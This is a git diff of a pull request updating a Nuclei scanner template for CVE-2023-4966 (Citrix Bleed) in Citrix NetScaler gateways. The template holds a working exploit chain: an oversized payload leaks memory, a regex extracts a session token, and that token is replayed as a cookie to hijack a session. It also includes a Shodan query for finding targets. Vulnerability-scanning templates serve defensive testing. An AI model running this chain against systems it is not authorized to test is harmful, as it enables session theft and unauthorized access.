Merge pull request #8649 from projectdiscovery/princechaddha-patch-4

Update CVE-2023-4966.yaml

http/cves/2023/CVE-2023-4966.yaml

@@ -18,15 +18,16 @@ info:
     cve-id: CVE-2023-4966
     cwe-id: CWE-119,NVD-CWE-noinfo
     epss-score: 0.92267
-    epss-percentile: 0.98699
+    epss-percentile: 0.98701
     cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
   metadata:
     verified: "true"
     max-request: 2
     vendor: citrix
     product: netscaler_application_delivery_controller
     shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway"
-  tags: cve,2023,citrix,adc,info-leak,kev
+  tags: cve,cve2023,citrix,adc,info-leak,kev,exposure
+
 variables:
   payload: '{{repeat("a", 24812)}}'
   str: "{{to_lower(rand_text_alpha(4))}}"
@@ -42,41 +43,29 @@ http:
         POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1
         Host: {{Hostname}}
         Cookie: NSC_AAAC={{session}}
-        User-Agent: python-requests/2.25.1
-        Accept-Encoding: gzip, deflate, br
-        Accept: */*
-        Connection: close
-        Content-Length: 0
-
 
     unsafe: true
-
     extractors:
       - type: regex
         name: session
         part: body_1
         group: 1
         regex:
-          - \b([a-f0-9]{65})\b
+          - '([a-f0-9]{100}45525d5f4f58455e445a4a42)'
         internal: true
 
       - type: regex
         part: body_2
         regex:
-          - '([a-z0-9]+)'
+          - '([a-z0-9._]+)'
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body_1
         words:
           - 'NSC_AAAC='
-          - '{"issuer":'
-        condition: and
+          - 'HTTP/1.1'
 
       - type: word
-        part: header_2
         words:
-          - "text/plain"
-
-# digest: 490a0046304402207db62b78d725e5835d539a432bbaa606647070f975c036210b895293b64bddc40220565ccd7d916d95908b020076aa1c8c751cf93be538acee8aa9c5b72e7e9346fd:922c64590222798bb761d5b6d8e72950
+          - '{"issuer":'